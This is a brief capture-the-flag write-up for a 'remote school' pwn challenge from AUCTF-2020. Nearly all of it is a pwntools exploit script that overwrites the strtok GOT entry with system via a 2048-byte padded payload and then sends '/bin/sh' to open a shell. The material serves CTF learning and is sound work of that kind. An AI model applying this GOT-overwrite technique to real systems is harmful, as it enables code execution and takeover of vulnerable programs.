Tags: pwn got
Rating: 5.0
Got overwrite attack: `strtok('/bin/sh')` -> `system('/bin/sh')`
```python
libcbase = 0xf7e19000
system = libcbase+0x0003ad80
strtok_got = 0x5655904c
offset = 2048
payload = 'A'*offset
payload += p32(system)
payload += p32(strtok_got)
sla('\tName: ','TaQini')
sla('> [? for menu]: ','attend Hacker')
# debug('b *0x56556591')
sla('Welcome!\n',payload)
# strtok(cmd) -> system(cmd)
sla('> [? for menu]: ','/bin/sh')
```
[Details](http://note.taqini.space/#/ctf/AUCTF-2020/?id=remote-school)